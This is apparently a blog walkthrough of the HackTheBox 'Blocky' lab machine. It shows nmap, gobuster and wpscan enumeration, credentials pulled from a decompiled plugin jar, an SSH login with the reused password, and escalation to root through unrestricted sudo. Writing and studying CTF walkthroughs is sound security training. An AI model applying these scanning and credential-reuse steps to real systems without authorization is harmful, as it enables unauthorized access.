HackTheBox Blocky Walkthrough

Initial Enumeration

I started the initial enumeration by running a full port scan using nmap looking for open ports and running services.

┌──(madhav㉿kali)-[~/ctf/htb/blocky]
└─$ nmap -sC -sV -p- -T5 -oN nmap/all-ports 10.10.10.37
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-12 11:04 IST
Nmap scan report for blocky.htb (10.10.10.37)
Host is up (0.15s latency).
Not shown: 65530 filtered tcp ports (no-response)
PORT      STATE  SERVICE   VERSION
21/tcp    open   ftp       ProFTPD 1.3.5a
22/tcp    open   ssh       OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 d6:2b:99:b4:d5:e7:53:ce:2b:fc:b5:d7:9d:79:fb:a2 (RSA)
|   256 5d:7f:38:95:70:c9:be:ac:67:a0:1e:86:e7:97:84:03 (ECDSA)
|_  256 09:d5:c2:04:95:1a:90:ef:87:56:25:97:df:83:70:67 (ED25519)
80/tcp    open   http      Apache httpd 2.4.18
|_http-server-header: Apache/2.4.18 (Ubuntu) 
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS 
|_http-generator: WordPress 4.8
|_http-title: BlockyCraft – Under Construction!
8192/tcp  closed sophos
25565/tcp open   minecraft Minecraft 1.11.2 (Protocol: 127, Message: A Minecraft Server, Users: 0/20)
Service Info: Host: 127.0.1.1; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 168.72 seconds

We have five different ports open:

Port 21 - FTP ProFTPD 1.3.5a
Port 22 - SSH
Port 80 - Apache httpd 2.4.18
Port 8192 - sophos
Port 25565 - Minecraft server 1.11.2

Let's start the enumeration with port 80 first.

Web Enumeration and User Shell

When we visit the url http://10.10.10.37 in our web browser, it redirects to http://blocky.htb. So let's add the blocky.htb hostname to our /etc/hosts file.

┌──(madhav㉿kali)-[~/ctf/htb]
└─$ cat /etc/hosts                          
127.0.0.1       localhost
127.0.1.1       kali
10.10.10.37     blocky.htb

Now when we visit http://blocky.htb in our web browser, it shows us a WordPress website.

After looking at one of the posts, I found a username notch.

Next I performed a gobuster scan to look for hidden files and directories.

┌──(madhav㉿kali)-[~/ctf/htb/blocky]
└─$ gobuster dir -u http://blocky.htb -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 10
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://blocky.htb
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2022/07/12 11:05:08 Starting gobuster in directory enumeration mode
===============================================================
/wiki                 (Status: 301) [Size: 307] [--> http://blocky.htb/wiki/]
/wp-content           (Status: 301) [Size: 313] [--> http://blocky.htb/wp-content/]
/plugins              (Status: 301) [Size: 310] [--> http://blocky.htb/plugins/]   
/wp-includes          (Status: 301) [Size: 314] [--> http://blocky.htb/wp-includes/]
/javascript           (Status: 301) [Size: 313] [--> http://blocky.htb/javascript/] 
/wp-admin             (Status: 301) [Size: 311] [--> http://blocky.htb/wp-admin/]   
/phpmyadmin           (Status: 301) [Size: 313] [--> http://blocky.htb/phpmyadmin/] 
/server-status        (Status: 403) [Size: 298]

===============================================================
2022/07/12 12:02:45 Finished
===============================================================

Let's check all these directories one by one.

http://blocky.htb/wiki - This has nothing useful.

http://blocky.htb/phpmyadmin - This contains the normal phpmyadmin installation but we do not have the credentials to login.

http://blocky.htb/plugins - This contains two .jar files. I downloaded both of them into my system.

To further enumerate these, I decompiled the binaries using the jd-gui tool. The griefprevention-1.11.2-3.1.1.298.jar is a GriefPrevention plugin from Minecraft Forge. It is less likely to contain any vulnerabilities.

The BlockyCore.jar contains an sql username and password.

Next I performed a wpscan to look for WordPress users and vulnerable plugins.

┌──(madhav㉿kali)-[~/ctf/htb/blocky]                                                                                                                                              
└─$ wpscan --url http://blocky.htb -e u,p                                                                                                                                         
_______________________________________________________________                                                                                                                   
         __          _______   _____                                                                                                                                              
         \ \        / /  __ \ / ____|                                                                                                                                             
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®                                                                                                                            
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \                                                                                                                             
            \  /\  /  | |     ____) | (__| (_| | | | |                                                                                                                            
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|                                                                                                                            
                                                                                                                                                                                  
         WordPress Security Scanner by the WPScan Team                                                                                                                            
                         Version 3.8.22                                                                                                                                           
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://blocky.htb/ [10.10.10.37]
[+] Started: Tue Jul 12 15:30:11 2022

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.18 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://blocky.htb/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/ 

[+] WordPress readme found: http://blocky.htb/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://blocky.htb/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)                                                                                                                                 
 | Confidence: 100%                                                                                                                                                               
                                                                                                                                                                                  
[+] The external WP-Cron seems to be enabled: http://blocky.htb/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 4.8 identified (Insecure, released on 2017-06-08).
 | Found By: Rss Generator (Passive Detection)
 |  - http://blocky.htb/index.php/feed/, <generator>https://wordpress.org/?v=4.8</generator>
 |  - http://blocky.htb/index.php/comments/feed/, <generator>https://wordpress.org/?v=4.8</generator>

[+] WordPress theme in use: twentyseventeen
 | Location: http://blocky.htb/wp-content/themes/twentyseventeen/
 | Last Updated: 2022-05-24T00:00:00.000Z
 | Readme: http://blocky.htb/wp-content/themes/twentyseventeen/README.txt
 | [!] The version is out of date, the latest version is 3.0
 | Style URL: http://blocky.htb/wp-content/themes/twentyseventeen/style.css?ver=4.8
 | Style Name: Twenty Seventeen
 | Style URI: https://wordpress.org/themes/twentyseventeen/
 | Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 1.3 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://blocky.htb/wp-content/themes/twentyseventeen/style.css?ver=4.8, Match: 'Version: 1.3'

[+] Enumerating Most Popular Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:01 <====================================================================================================> (10 / 10) 100.00% Time: 00:00:01

[i] User(s) Identified:

[+] notch
 | Found By: Author Posts - Author Pattern (Passive Detection)
 | Confirmed By:
 |  Wp Json Api (Aggressive Detection)
 |   - http://blocky.htb/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] Notch
 | Found By: Rss Generator (Passive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Tue Jul 12 15:30:23 2022
[+] Requests Done: 56
[+] Cached Requests: 7
[+] Data Sent: 14.556 KB
[+] Data Received: 458.008 KB
[+] Memory used: 227.941 MB
[+] Elapsed time: 00:00:11

We have only one wordpress user. I tried login using this username and the password we found earlier into /wp-admin but it doesn't work.

But we can login using these credentials as user notch via SSH.

┌──(madhav㉿kali)-[~/ctf/htb/blocky]
└─$ sshpass -p 8YsqfCTnvxAUeduzjNSXe22 ssh notch@blocky.htb
                                                                      
The authenticity of host 'blocky.htb (10.10.10.37)' can't be established.
ED25519 key fingerprint is SHA256:ZspC3hwRDEmd09Mn/ZlgKwCv8I8KDhl9Rt2Us0fZ0/8.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'blocky.htb' (ED25519) to the list of known hosts.
Welcome to Ubuntu 16.04.2 LTS (GNU/Linux 4.4.0-62-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

7 packages can be updated.
7 updates are security updates.


Last login: Tue Jul 12 02:28:22 2022 from 10.10.14.5
notch@Blocky:~$ id
uid=1000(notch) gid=1000(notch) groups=1000(notch),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare)

We got a shell! Now we can read our user flag present in the home directory of user notch.

notch@Blocky:~$ cat user.txt 
b1ec3aef************************

Root Shell

Getting a root shell was a piece of cake! I used the sudo -l command to check if the user notch can run any command as root.

notch@Blocky:~$ sudo -l
[sudo] password for notch: 
Matching Defaults entries for notch on Blocky:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User notch may run the following commands on Blocky:
    (ALL : ALL) ALL

Bingo! The user can run all commands as user root. So we can use the following command to get a shell as user root.

notch@Blocky:~$ sudo su -
root@Blocky:~# id
uid=0(root) gid=0(root) groups=0(root)

Hurray! We are root. Now we can read our final flag present in the root directory.

root@Blocky:~# cat root.txt 
79e5ef26************************

That’s it! Thanks for reading. Stay tuned for similar walkthroughs and much more coming up in the near future!

NOTE: The awesome artwork used in this article was created by Bradley Armstrong.